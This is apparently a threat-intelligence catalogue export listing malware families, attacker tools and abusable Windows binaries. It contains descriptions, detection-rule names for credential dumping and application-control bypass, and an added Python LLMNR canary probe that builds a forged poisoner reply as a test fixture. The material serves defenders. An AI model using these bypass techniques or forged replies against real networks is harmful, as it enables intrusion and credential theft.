RATANKBA is a remote controller tool used by Lazarus Group. RATANKBA has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. RATANKBA has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. [Lazarus RATANKBA] [RATANKBA]
Internal MISP references
UUID 40466d7d-a107-46aa-a6fc-180e0eef2c6b
which can be used as unique global reference for RATANKBA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0241 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RawDisk
RawDisk is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.[EldoS RawDisk ITpro][Novetta Blockbuster Destructive Malware]
Internal MISP references
UUID d86a562d-d235-4481-9a3f-273fa3ebe89a
which can be used as unique global reference for RawDisk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0364 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RawPOS
RawPOS is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [Kroll RawPOS Jan 2017] [TrendMicro RawPOS April 2015] [Visa RawPOS March 2015] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [Mandiant FIN5 GrrCON Oct 2016] [DarkReading FireEye FIN5 Oct 2015]
Internal MISP references
UUID 6ea1bf95-fed8-4b94-8071-aa19a3af5e34
which can be used as unique global reference for RawPOS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0169 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rclone
Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[Rclone][Rclone Wars][Detecting Rclone][DarkSide Ransomware Gang][DFIR Conti Bazar Nov 2021]
Internal MISP references
UUID 1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4
which can be used as unique global reference for Rclone
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S1040 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a40b7316-bef6-4186-9764-58ce6f033850', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RCSession
RCSession is a backdoor written in C++ that has been in use since at least 2018 by Mustang Panda and by Threat Group-3390 (Type II Backdoor).[Secureworks BRONZE PRESIDENT December 2019][Trend Micro Iron Tiger April 2021][Trend Micro DRBControl February 2020]
Internal MISP references
UUID 38c4d208-fe38-4965-871c-709fa1479ba3
which can be used as unique global reference for RCSession
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0662 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
rcsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Non-Interactive command line interface included with Visual Studio.
Author: Oddvar Moe
Paths: * no default
Resources: * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: proc_creation_win_csi_execution.yml[rcsi.exe - LOLBAS Project]
Internal MISP references
UUID 9a5cff11-6bad-407a-a53c-2562a56ac024
which can be used as unique global reference for rcsi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5233 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RDAT
RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[Unit42 RDAT July 2020]
Internal MISP references
UUID 567da30e-fd4d-4ec5-a308-bf08788f3bfb
which can be used as unique global reference for RDAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0495 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDFSNIFFER
RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID ca4e973c-da15-46a9-8f3a-0b1560c9a783
which can be used as unique global reference for RDFSNIFFER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0416 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDP Recognizer
RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 22d9f7be-7447-4cce-90f0-67a13d4b6a82
which can be used as unique global reference for RDP Recognizer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5012 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
rdrleakdiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows resource leak diagnostic tool
Author: John Dwyer
Paths: * c:\windows\system32\rdrleakdiag.exe * c:\Windows\SysWOW64\rdrleakdiag.exe
Resources: * https://twitter.com/0gtweet/status/1299071304805560321?s=21 * https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ * https://github.com/LOLBAS-Project/LOLBAS/issues/84
Detection: * Sigma: proc_creation_win_rdrleakdiag_process_dumping.yml * Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html * Elastic: credential_access_cmdline_dump_tool.toml[rdrleakdiag.exe - LOLBAS Project]
Internal MISP references
UUID 3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1
which can be used as unique global reference for rdrleakdiag
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5147 |
source | Tidal Cyber |
tags | ['9fbc403c-bd2e-458a-a202-a65b8201e973', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Reaver
Reaver is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of Control Panel items.[Palo Alto Reaver Nov 2017]
Internal MISP references
UUID ca544771-d43e-4747-80e5-cf0f4a4836f3
which can be used as unique global reference for Reaver
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0172 |
source | MITRE |
type | ['malware'] |
RedLeaves
RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus. [PWC Cloud Hopper Technical Annex April 2017] [FireEye APT10 April 2017]
Internal MISP references
UUID 5264c3ab-14e1-4ae1-854e-889ebde029b4
which can be used as unique global reference for RedLeaves
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0153 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Reg
Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [Microsoft Reg]
Utilities such as Reg are known to be used by persistent threats. [Windows Commands JPCERT]
Internal MISP references
UUID d796615c-fa3d-4afd-817a-1a3db8c73532
which can be used as unique global reference for Reg
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0075 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ec4a7c87-051b-4b7d-8acc-03696fe2113e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Regasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: suspicious_regsvcs_regasm_activity.md * Splunk: detect_regasm_with_network_connection.yml * IOC: regasm.exe executing dll file[LOLBAS Regasm]
Internal MISP references
UUID 1e892f4b-5398-44ac-aeb4-2e50f70c5716
which can be used as unique global reference for Regasm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5148 |
source | Tidal Cyber |
tags | ['7d31d8f7-375b-4fb3-a631-51b42e58d95a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RegDuke
RegDuke is a first stage implant written in .NET and used by APT29 since at least 2017. RegDuke has been used to control a compromised machine when control of other implants on the machine was lost.[ESET Dukes October 2019]
Internal MISP references
UUID 52dc08d8-82cc-46dc-91ae-383193d72963
which can be used as unique global reference for RegDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0511 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Regedit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manipulate registry
Author: Oddvar Moe
Paths: * C:\Windows\regedit.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regedit_import_keys_ads.yml * IOC: regedit.exe reading and writing to alternate data stream * IOC: regedit.exe should normally not be executed by end-users[Regedit.exe - LOLBAS Project]
Internal MISP references
UUID 16cc6ff2-8804-4863-aede-40c4376e0af3
which can be used as unique global reference for Regedit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5149 |
source | Tidal Cyber |
tags | ['36affa3d-c949-4e1b-8667-299490580dd5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regin
Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003. [Kaspersky Regin]
Internal MISP references
UUID e88bf527-bb9c-45c3-b86b-04a07dcd91fd
which can be used as unique global reference for Regin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0019 |
source | MITRE |
type | ['malware'] |
Regini
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to manipulate the registry
Author: Oddvar Moe
Paths: * C:\Windows\System32\regini.exe * C:\Windows\SysWOW64\regini.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regini_ads.yml * Sigma: proc_creation_win_regini_execution.yml * IOC: regini.exe reading from ADS[Regini.exe - LOLBAS Project]
Internal MISP references
UUID 92457f9e-c2e6-4d61-b927-0d8ff0f6d617
which can be used as unique global reference for Regini
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5150 |
source | Tidal Cyber |
tags | ['288c6e19-cf6c-451a-aff3-547f371ff4ad', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Register-cimprovider
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to register new wmi providers
Author: Oddvar Moe
Paths: * C:\Windows\System32\Register-cimprovider.exe * C:\Windows\SysWOW64\Register-cimprovider.exe
Resources: * https://twitter.com/PhilipTsukerman/status/992021361106268161
Detection: * Sigma: proc_creation_win_susp_register_cimprovider.yml * IOC: Register-cimprovider.exe execution and cmdline DLL load may be suspicious[Register-cimprovider.exe - LOLBAS Project]
Internal MISP references
UUID c80bac89-6b63-4860-9f66-260976a184e8
which can be used as unique global reference for Register-cimprovider
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5151 |
source | Tidal Cyber |
tags | ['d379a1fb-1028-4986-ae6c-eb8cc068aa68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: Oddvar Moe
Paths: * c:\Windows\Microsoft.NET\Framework\v\regsvcs.exe * c:\Windows\Microsoft.NET\Framework64\v\regsvcs.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: detect_regsvcs_with_network_connection.yml[LOLBAS Regsvcs]
Internal MISP references
UUID 271dd92b-76ee-4a00-ba41-343c32fc084e
which can be used as unique global reference for Regsvcs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5152 |
source | Tidal Cyber |
tags | ['141e4dce-00be-4bd7-9f81-6202939f0359', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regsvr32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to register dlls
Author: Oddvar Moe
Paths: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe
Resources: * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
Detection: * Sigma: proc_creation_win_regsvr32_susp_parent.yml * Sigma: proc_creation_win_regsvr32_susp_child_process.yml * Sigma: proc_creation_win_regsvr32_susp_exec_path_1.yml * Sigma: proc_creation_win_regsvr32_network_pattern.yml * Sigma: net_connection_win_regsvr32_network_activity.yml * Sigma: dns_query_win_regsvr32_network_activity.yml * Sigma: proc_creation_win_regsvr32_flags_anomaly.yml * Sigma: file_event_win_net_cli_artefact.yml * Splunk: detect_regsvr32_application_control_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * IOC: regsvr32.exe retrieving files from Internet * IOC: regsvr32.exe executing scriptlet (sct) files * IOC: DotNet CLR libraries loaded into regsvr32.exe * IOC: DotNet CLR Usage Log - regsvr32.exe.log[LOLBAS Regsvr32]
Internal MISP references
UUID 533d2c42-45a7-456e-af75-b61e2aff98a7
which can be used as unique global reference for Regsvr32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5153 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '32be7240-e5ea-4e8a-8e95-7c1bd7869754', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remcos
Remcos is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. Remcos has been observed being used in malware campaigns.[Riskiq Remcos Jan 2018][Talos Remcos Aug 2018]
Internal MISP references
UUID 2eb92fa8-514e-4018-adc4-c9fe4f082567
which can be used as unique global reference for Remcos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0332 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remexi
Remexi is a Windows-based Trojan that was developed in the C programming language.[Securelist Remexi Jan 2019]
Internal MISP references
UUID 82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb
which can be used as unique global reference for Remexi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0375 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Remote
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Resources: * https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Detection: * IOC: remote.exe process spawns * Sigma: proc_creation_win_lolbin_remote.yml[Remote.exe - LOLBAS Project]
Internal MISP references
UUID 3a1436e9-ce2c-449e-a670-c1b212ebd754
which can be used as unique global reference for Remote
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5234 |
source | Tidal Cyber |
tags | ['828f1559-b13d-4426-9dcf-5f601fcb6ff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RemoteCMD
RemoteCMD is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal's PSEXEC functionality. [Symantec Buckeye]
Internal MISP references
UUID 57fa64ea-975a-470a-a194-3428148ae9ee
which can be used as unique global reference for RemoteCMD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0166 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RemoteUtilities
RemoteUtilities is a legitimate remote administration tool that has been used by MuddyWater since at least 2021 for execution on target machines.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 8a7fa0df-c688-46be-94bf-462fae33b788
which can be used as unique global reference for RemoteUtilities
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0592 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remsec
Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [Symantec Strider Blog]
Internal MISP references
UUID e3729cff-f25e-4c01-a7a1-e8b83e903b30
which can be used as unique global reference for Remsec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0125 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Replace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to replace file with another file
Author: Oddvar Moe
Paths: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe
Resources: * https://twitter.com/elceef/status/986334113941655553 * https://twitter.com/elceef/status/986842299861782529
Detection: * IOC: Replace.exe retrieving files from remote server * Sigma: proc_creation_win_lolbin_replace.yml[Replace.exe - LOLBAS Project]
Internal MISP references
UUID 19a04c82-f816-464c-b050-a57269cba157
which can be used as unique global reference for Replace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5154 |
source | Tidal Cyber |
tags | ['accb4d24-4b40-41ce-ae2e-adcca7e80b41', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Responder
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [GitHub Responder]
Internal MISP references
UUID 2a5ea3a7-9873-4a2e-b4b5-4e27a80db305
which can be used as unique global reference for Responder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0174 |
source | MITRE |
tags | ['af5e9be5-b86e-47af-91dd-966a5e34a186', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
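Added example (not part of the Tidal or MITRE entry, and not Responder's own code): a canary probe that detects LLMNR poisoners of the kind Responder implements. It sends one LLMNR query (RFC 4795: DNS wire format on UDP 5355, multicast 224.0.0.252) for a hostname that cannot legitimately resolve, and treats any A record answering that name as a poisoner, since only a host answering every name it hears would reply. The parser handles the name-compression pointer real responders use. The canary name, the transaction ID and the forged reply from 10.0.0.66 are constructed fixtures so the demo runs offline; probe() performs the same check live.

```python
import socket
import struct

# RFC 4795: LLMNR reuses the DNS message format on UDP 5355 / 224.0.0.252.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """Encode a hostname as DNS labels (no compression)."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(txid, name):
    """Standard LLMNR A query for `name` (QDCOUNT=1, no answers)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:               # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length


def parse_message(msg):
    """Parse header, question and answer sections; A records only."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        off += 4                                  # skip QTYPE + QCLASS
        questions.append(name)
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def poisoner_answers(msg, expected_id, canary):
    """A records answering our canary query. The canary name is chosen so
    that no legitimate host owns it, so any answer is a poisoner."""
    parsed = parse_message(msg)
    if not parsed["is_response"] or parsed["id"] != expected_id:
        return []
    return [(n, ip) for n, ip in parsed["answers"] if n.lower() == canary.lower()]


def build_forged_response(txid, name, ip):
    """Constructed fixture: what a Responder-style poisoner sends back
    (QR bit set, question echoed, one A record pointing at the attacker)."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = (b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4)
              + socket.inet_aton(ip))
    return header + question + answer


def probe(canary, txid=0x1234, timeout=2.0):
    """Live check: multicast one canary query and collect any answers.
    Not used by the offline demo below."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(txid, canary), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, src = sock.recvfrom(4096)
            hits += [(src[0], n, ip) for n, ip in poisoner_answers(data, txid, canary)]
    except socket.timeout:
        pass
    return hits


CANARY = "canary-host-7f3a"                                    # constructed, non-existent name
SAMPLE_RESPONSE = build_forged_response(0x1234, CANARY, "10.0.0.66")  # constructed poisoner reply

if __name__ == "__main__":
    print(poisoner_answers(SAMPLE_RESPONSE, 0x1234, CANARY))    # [('canary-host-7f3a', '10.0.0.66')]
```

Run probe() from a few subnets on a schedule; a single answer is actionable, because nothing but a poisoner answers a random name. Disabling LLMNR and NBT-NS by policy removes the attack surface entirely, and the probe then doubles as a check that the policy is actually applied.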
Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[Cylance Shaheen Nov 2018][Cofense RevengeRAT Feb 2019]
Internal MISP references
UUID f99712b4-37a2-437c-92d7-fb4f94a1f892
which can be used as unique global reference for Revenge RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0379 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
REvil
REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[Secureworks REvil September 2019][Intel 471 REvil March 2020][Group IB Ransomware May 2020]
Internal MISP references
UUID 9314531e-bf46-4cba-9c19-198279ccf9cd
which can be used as unique global reference for REvil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0496 |
source | MITRE |
